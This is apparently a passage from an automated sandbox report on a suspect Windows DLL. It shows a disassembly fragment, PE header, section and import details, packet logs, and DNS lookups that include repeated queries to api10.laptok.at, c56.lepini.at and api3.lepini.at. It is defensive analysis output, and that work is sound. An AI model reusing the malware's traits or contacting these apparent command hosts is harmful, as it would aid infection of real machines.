or eax, FFFFFFFFh
lock xadd dword ptr [esi], eax
mov dword ptr [ebp-04h], edi
jmp 00007F715C7FFFEFh
push 00404108h
call dword ptr [0040303Ch]
test eax, eax
jne 00007F715C7FFFE0h
cmp dword ptr [0040410Ch], edi
je 00007F715C7FFFCCh
mov esi, 00002710h
push ebx
push 00000064h
call dword ptr [00403034h]
mov eax, dword ptr [00404118h]
test eax, eax
je 00007F715C7FFFA9h
sub esi, 64h
cmp esi, edi
jnle 00007F715C7FFF89h
push dword ptr [0040410Ch]
call dword ptr [00003050h]

Rich Headers

Programming Language:

[LNK] VS2005 build 50727
[EXP] VS2005 build 50727
[IMP] VS2008 SP1 build 30729
[ASM] VS2005 build 50727

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x35d0	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x312c	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6000	0x154	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3000	0xcc	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2000	0x2000	False	0.506713867188	data	5.09404671982	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x3000	0x1000	0x1000	False	0.256591796875	data	2.70691419034	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x4000	0x1000	0x1000	False	0.016357421875	data	0.0602032822141	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.bss	0x5000	0x1000	0x1000	False	0.166015625	DOS executable (COM, 0x8C-variant)	1.72513008267	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0x6000	0x9000	0x9000	False	0.884847005208	data	7.49744643427	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Imports

DLL	Import
SHLWAPI.dll	StrStrIA
KERNEL32.dll	HeapAlloc, GetLastError, VerLanguageNameA, Sleep, GetSystemTime, SwitchToThread, HeapFree, GetLocaleInfoA, ExitThread, lstrlenW, GetSystemDefaultUILanguage, SleepEx, WaitForSingleObject, InterlockedDecrement, HeapCreate, HeapDestroy, InterlockedIncrement, CreateThread, CloseHandle, GetExitCodeThread, GetModuleFileNameW, QueueUserAPC, TerminateThread, lstrlenA, GetSystemTimeAsFileTime, SetLastError, GetModuleHandleA, VirtualProtect, GetLongPathNameW, OpenProcess, GetVersion, GetCurrentProcessId, CreateEventA, GetProcAddress, LoadLibraryA, VirtualFree, VirtualAlloc, MapViewOfFile, CreateFileMappingW
ntdll.dll	_snwprintf, memcpy, memset, _aulldiv, RtlUnwind, NtQueryVirtualMemory
ADVAPI32.dll	ConvertStringSecurityDescriptorToSecurityDescriptorA

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x402089

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 26, 2021 19:44:17.459254980 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.471765995 CET	49739	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.472732067 CET	49740	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.472805977 CET	49741	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.472856998 CET	49742	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.472979069 CET	49743	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.504081964 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.504196882 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.506138086 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.515450954 CET	443	49739	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.515993118 CET	49739	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.516550064 CET	443	49740	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.516575098 CET	443	49742	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.516604900 CET	443	49741	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.516623974 CET	443	49743	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.516629934 CET	49739	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.516664028 CET	49740	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.516706944 CET	49742	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.517067909 CET	49743	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.517076969 CET	49741	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.518554926 CET	49743	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.518816948 CET	49740	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.518893003 CET	49742	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.519063950 CET	49741	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.550807953 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.551657915 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.551681042 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.551697969 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.551930904 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.559186935 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.559313059 CET	443	49739	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.559880018 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.560079098 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.560230017 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.560317993 CET	443	49739	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.560340881 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.560343027 CET	443	49739	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.560354948 CET	443	49739	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.560435057 CET	49739	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.560496092 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.560611010 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.560726881 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.560836077 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.560946941 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.561050892 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.561206102 CET	443	49743	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.561450005 CET	443	49740	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.561513901 CET	443	49742	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.562123060 CET	443	49741	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.562342882 CET	443	49743	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.562362909 CET	443	49743	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.562427044 CET	49743	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.562694073 CET	443	49743	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.562782049 CET	49743	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.562803984 CET	49743	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.563035965 CET	443	49741	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.563055992 CET	443	49741	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.563071966 CET	443	49742	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.563087940 CET	443	49742	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.563131094 CET	443	49741	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.563146114 CET	443	49742	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.563167095 CET	49742	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.563185930 CET	49741	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.563210964 CET	49742	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.563221931 CET	49741	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.563230038 CET	49741	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.565742970 CET	49743	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.565808058 CET	443	49740	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.565835953 CET	443	49740	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.565854073 CET	443	49740	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.565891981 CET	49740	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.565928936 CET	49740	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.566159010 CET	49743	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.586282015 CET	49740	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.586659908 CET	49740	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.589936972 CET	49739	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.590338945 CET	49739	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.593310118 CET	49741	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.593396902 CET	49742	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.593719006 CET	49741	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.593800068 CET	49742	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.602766037 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.603121996 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.604255915 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.608700037 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.608850956 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.608870029 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.608892918 CET	443	49743	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.608930111 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.608935118 CET	443	49743	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.608971119 CET	49743	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.608997107 CET	49743	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.610198975 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.610443115 CET	49743	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.611021996 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.611043930 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.611062050 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.611079931 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.611100912 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.611119032 CET	443	49738	151.101.1.44	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 26, 2021 19:44:02.993038893 CET	60338	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:03.043802977 CET	53	60338	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:04.116122007 CET	58717	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:04.177619934 CET	53	58717	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:05.258722067 CET	59762	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:05.317347050 CET	53	59762	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:06.523667097 CET	54329	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:06.571649075 CET	53	54329	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:07.665237904 CET	58052	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:07.713083029 CET	53	58052	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:09.338989973 CET	54008	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:09.386842966 CET	53	54008	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:10.203071117 CET	59451	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:10.260735035 CET	53	59451	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:11.108239889 CET	52914	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:11.164788961 CET	53	52914	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:11.397770882 CET	64569	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:11.448553085 CET	53	64569	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:11.821141958 CET	52816	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:11.839364052 CET	50781	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:11.869055033 CET	53	52816	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:11.897134066 CET	53	50781	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:12.439893961 CET	54230	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:12.503371000 CET	53	54230	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:13.404998064 CET	54911	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:13.479212999 CET	53	54911	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:13.710218906 CET	49958	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:13.777025938 CET	53	49958	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:14.059123993 CET	50860	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:14.117424011 CET	53	50860	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:14.723361969 CET	50452	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:14.792490005 CET	53	50452	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:15.172902107 CET	59730	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:15.238953114 CET	53	59730	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:15.762856007 CET	59310	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:15.813783884 CET	53	59310	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:15.944129944 CET	51919	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:16.005400896 CET	53	51919	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:16.199652910 CET	64296	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:16.247451067 CET	53	64296	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:17.323821068 CET	56680	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:17.373538017 CET	53	56680	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:17.395212889 CET	58820	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:17.457542896 CET	53	58820	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:18.833287001 CET	60983	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:18.882883072 CET	53	60983	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:20.032145977 CET	49247	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:20.080059052 CET	53	49247	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:21.529850006 CET	52286	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:21.577744007 CET	53	52286	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:22.816001892 CET	56064	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:22.875411034 CET	53	56064	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:24.004837990 CET	63744	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:24.054457903 CET	53	63744	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:26.116363049 CET	61457	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:27.119858027 CET	61457	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:28.130816936 CET	61457	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:28.181720018 CET	53	61457	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:28.928478003 CET	58367	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:28.986675024 CET	53	58367	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:29.369446993 CET	60599	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:29.417937040 CET	53	60599	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:34.287796974 CET	59571	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:34.337919950 CET	53	59571	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:40.121989965 CET	52689	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:40.180481911 CET	53	52689	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:40.929605007 CET	50290	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:40.977605104 CET	53	50290	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:41.163480043 CET	52689	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:41.219980001 CET	53	52689	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:41.613308907 CET	60427	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:41.671884060 CET	53	60427	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:41.932552099 CET	50290	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:41.990911961 CET	53	50290	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:42.497716904 CET	52689	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:42.545490026 CET	53	52689	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:42.949671984 CET	50290	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:42.997647047 CET	53	50290	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:44.506155014 CET	52689	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:44.554092884 CET	53	52689	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:44.962238073 CET	50290	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:45.010066032 CET	53	50290	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:48.515727997 CET	52689	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:48.563651085 CET	53	52689	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:48.968615055 CET	50290	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:49.025178909 CET	53	50290	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:52.714642048 CET	56209	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:52.765424013 CET	53	56209	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:52.868155003 CET	59582	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:52.915985107 CET	53	59582	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:53.015986919 CET	60949	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:53.076345921 CET	53	60949	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:53.589876890 CET	58542	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:53.640605927 CET	53	58542	8.8.8.8	192.168.2.7
Jan 26, 2021 19:44:59.110050917 CET	59179	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:44:59.476310015 CET	53	59179	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:01.604585886 CET	60927	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:01.667434931 CET	53	60927	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:08.121176004 CET	57854	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:08.180840969 CET	53	57854	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:08.960386038 CET	62026	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:09.016892910 CET	53	62026	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:09.120060921 CET	59453	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:09.176258087 CET	53	59453	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:09.983807087 CET	62468	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:10.054007053 CET	53	62468	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:10.147603989 CET	52563	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:10.204359055 CET	53	52563	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:10.942673922 CET	54721	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:11.001180887 CET	53	54721	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:11.632985115 CET	62826	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:11.692070961 CET	53	62826	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:12.296797037 CET	62046	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:12.359728098 CET	53	62046	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:13.338100910 CET	51223	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:13.396527052 CET	53	51223	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:14.658134937 CET	63908	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:14.714534998 CET	53	63908	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:15.895750046 CET	49226	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:15.952486038 CET	53	49226	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:16.430962086 CET	60212	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:16.493179083 CET	53	60212	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:17.710565090 CET	58867	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:18.082550049 CET	53	58867	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:40.549433947 CET	50864	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:40.600249052 CET	53	50864	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:42.551076889 CET	61504	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:42.607575893 CET	53	61504	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:51.131093979 CET	60231	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:51.187516928 CET	53	60231	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:52.352104902 CET	50095	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:52.400259018 CET	53	50095	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:56.178844929 CET	59654	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:56.179373026 CET	58233	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:56.226835012 CET	53	59654	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:56.227113008 CET	53	58233	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:56.443766117 CET	56822	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:56.817686081 CET	53	56822	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:57.560383081 CET	62572	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:57.887608051 CET	53	62572	8.8.8.8	192.168.2.7
Jan 26, 2021 19:45:58.541121960 CET	57179	53	192.168.2.7	8.8.8.8
Jan 26, 2021 19:45:58.597937107 CET	53	57179	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 26, 2021 19:44:11.397770882 CET	192.168.2.7	8.8.8.8	0x1459	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:13.404998064 CET	192.168.2.7	8.8.8.8	0xc338	Standard query (0)	web.vortex.data.msn.com	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:13.710218906 CET	192.168.2.7	8.8.8.8	0xd695	Standard query (0)	contextual.media.net	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:14.723361969 CET	192.168.2.7	8.8.8.8	0x8909	Standard query (0)	lg3.media.net	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:15.172902107 CET	192.168.2.7	8.8.8.8	0xc2bd	Standard query (0)	hblg.media.net	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:15.944129944 CET	192.168.2.7	8.8.8.8	0x997d	Standard query (0)	cvision.media.net	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:16.199652910 CET	192.168.2.7	8.8.8.8	0xec89	Standard query (0)	srtb.msn.com	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:17.395212889 CET	192.168.2.7	8.8.8.8	0x449c	Standard query (0)	img.img-taboola.com	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:59.110050917 CET	192.168.2.7	8.8.8.8	0xa9ca	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:08.960386038 CET	192.168.2.7	8.8.8.8	0xdbb8	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:17.710565090 CET	192.168.2.7	8.8.8.8	0x3736	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:51.131093979 CET	192.168.2.7	8.8.8.8	0x1200	Standard query (0)	c56.lepini.at	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:56.178844929 CET	192.168.2.7	8.8.8.8	0xc20a	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:56.179373026 CET	192.168.2.7	8.8.8.8	0xe218	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:56.443766117 CET	192.168.2.7	8.8.8.8	0xf2bd	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:57.560383081 CET	192.168.2.7	8.8.8.8	0xc753	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Jan 26, 2021 19:45:58.541121960 CET	192.168.2.7	8.8.8.8	0x3b1c	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 26, 2021 19:44:11.448553085 CET	8.8.8.8	192.168.2.7	0x1459	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Jan 26, 2021 19:44:13.479212999 CET	8.8.8.8	192.168.2.7	0xc338	No error (0)	web.vortex.data.msn.com	web.vortex.data.microsoft.com		CNAME (Canonical name)	IN (0x0001)
Jan 26, 2021 19:44:13.777025938 CET	8.8.8.8	192.168.2.7	0xd695	No error (0)	contextual.media.net		92.122.253.103	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:14.792490005 CET	8.8.8.8	192.168.2.7	0x8909	No error (0)	lg3.media.net		92.122.253.103	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:15.238953114 CET	8.8.8.8	192.168.2.7	0xc2bd	No error (0)	hblg.media.net		92.122.253.103	A (IP address)	IN (0x0001)
Jan 26, 2021 19:44:16.005400896 CET	8.8.8.8	192.168.2.7	0x997d	No error (0)	cvision.media.net	cvision.media.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Jan 26, 2021 19:44:16.247451067 CET	8.8.8.8	192.168.2.7	0xec89	No error (0)	srtb.msn.com	www.msn.com		CNAME (Canonical name)	IN (0x0001)
Jan 26, 2021 19:44:16.247451067 CET	8.8.8.8	192.168.2.7	0xec89	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Jan 26, 2021 19:44:17.457542896 CET	8.8.8.8	192.168.2.7	0x449c	No error (0)	img.img-taboola.com	tls13.taboola.map.fastly.net		CNAME (Canonical name)	IN (0x0001)
